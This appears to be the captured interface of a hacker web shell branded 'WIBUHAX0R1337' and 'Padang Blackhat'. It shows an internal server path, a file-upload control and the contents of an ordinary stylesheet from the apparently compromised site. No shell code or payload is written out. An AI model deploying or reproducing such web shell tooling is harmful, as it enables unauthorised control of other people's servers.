-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
var
/
www
/
clients
/
client4
/
web4
/
web
/
imengs
/
Upload File:
files >> /var/www/clients/client4/web4/web/imengs/style.css
@import url('https://fonts.googleapis.com/css2?family=Noto+Sans+Thai&display=swap'); *{ margin: 0; padding: 0; box-sizing: border-box; list-style: none; text-decoration: none; font-family: 'Noto Sans Thai', sans-serif; } @media (min-width: 768px) { .col-lg-8 { flex: 0 0 66.66667%; max-width: 66.66667%; } .col-lg-4 { flex: 0 0 33.33333%; max-width: 33.33333%; } } body{ background-color: #b6b6b6; } .logo-page{ padding-left: 20%; } .text-v-center { margin: auto; padding: 25px; } .footer1 { padding-left: 10%; padding-right: 10%; background-color: #252525; color: white; } .footer2 { background-color: #000000; color: white; } div.sticky { position: sticky; top: 50px; padding: 0px; } div.paragrap { text-indent: 50px; } .dropdown:hover .dropdown-menu { display: block; } .d-block.text-cmru{ color: rgb(255, 204, 0); } .spinner { display: none; } /* end */ /* Container ของ Flip Box */ .flip-box { background-color: transparent; width: 100%; height: 200px; /* กำหนดความสูงของกล่อง */ perspective: 1000px; /* ทำให้เกิดมิติ 3D */ } /* Inner Container ที่จะถูกพลิก */ .flip-box-inner { position: relative; width: 100%; height: 100%; text-align: center; transition: transform 0.6s; /* กำหนดความเร็วในการพลิก */ transform-style: preserve-3d; /* ทำให้องค์ประกอบลูกแสดงผลแบบ 3D */ box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2); border-radius: 8px; } /* เมื่อเมาส์ hover ที่กล่อง */ .flip-box:hover .flip-box-inner { transform: rotateY(180deg); } /* ด้านหน้าและด้านหลังของกล่อง */ .flip-box-front, .flip-box-back { position: absolute; width: 100%; height: 100%; -webkit-backface-visibility: hidden; /* ซ่อนด้านหลังเมื่อไม่ถูกพลิก */ backface-visibility: hidden; display: flex; flex-direction: column; justify-content: center; align-items: center; border-radius: 8px; padding: 20px; } .flip-box-front { background-color: #242666; /* สีพื้นหลังด้านหน้า */ color: white; } .flip-box-front i { font-size: 3rem; margin-bottom: 10px; } .flip-box-front h3 { margin: 0; } .flip-box-back { background-color: #c36e12; /* สีพื้นหลังด้านหลัง */ color: white; transform: rotateY(180deg); /* หมุนด้านหลังให้หันไปอีกด้านตั้งแต่แรก */ } .carousel-container-fixed-text { position: relative; /* กำหนดตำแหน่งหลักสำหรับ overlay */ border-radius: 8px; /* ขอบโค้งมน */ overflow: hidden; /* ซ่อนส่วนเกิน */ } /* ข้อความที่อยู่กับที่ด้านบนซ้าย */ .fixed-text-overlay-left { position: absolute; top: 20px; left: 20px; z-index: 10; /* ให้ข้อความอยู่ด้านหน้า */ color: white; text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.7); /* เพิ่มเงาให้ข้อความอ่านง่าย */ text-align: left; width: 100%; /* กำหนดความกว้างของกล่องข้อความ */ } .fixed-text-overlay-left h1 { font-size: 3rem; font-weight: bold; margin: 0; } .fixed-text-overlay-left p { font-size: 1.5rem; margin: 0; } /* Custom CSS สำหรับ Carousel Fade & Zoom */ /* กำหนดให้รูปภาพเต็มพื้นที่ container */ .carousel-inner { position: relative; width: 100%; overflow: hidden; } /* Container ที่ใช้สำหรับซูมรูปภาพ */ .carousel-image-container { height: 100%; overflow: hidden; /* ป้องกันรูปภาพที่ซูมแล้วเกินขอบ */ } .carousel-image-container img { height: 100%; object-fit: cover; transform: scale(1); /* ตั้งค่าเริ่มต้นที่ไม่ซูม */ transition: transform 6s cubic-bezier(0.25, 0.46, 0.45, 0.94); /* กำหนดความเร็วในการซูม */ } /* เมื่อ carousel-item เป็น active (กำลังแสดง) */ /* ให้รูปภาพซูมเข้า */ .carousel-item.active .carousel-image-container img { transform: scale(1.15); /* ซูม 15% */ } /* กำหนดการเปลี่ยนแบบ Fade สำหรับ Carousel */ /* ต้องใส่คลาส carousel-fade ใน HTML */ .carousel-fade .carousel-item { transition: opacity .10s ease-in-out; opacity: 0; } .carousel-fade .carousel-item.active, .carousel-fade .carousel-item-next.carousel-item-start, .carousel-fade .carousel-item-prev.carousel-item-end { opacity: 1; } /* ทำให้ item ที่ไม่ได้ active หายไปอย่างรวดเร็ว */ .carousel-fade .active.carousel-item-start, .carousel-fade .active.carousel-item-end { transition: none; opacity: 0; } /* สไตล์สำหรับปุ่มควบคุม (Navigation) */ .carousel-control-prev-icon, .carousel-control-next-icon { background-color: rgba(0, 0, 0, 0.5); border-radius: 50%; }
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥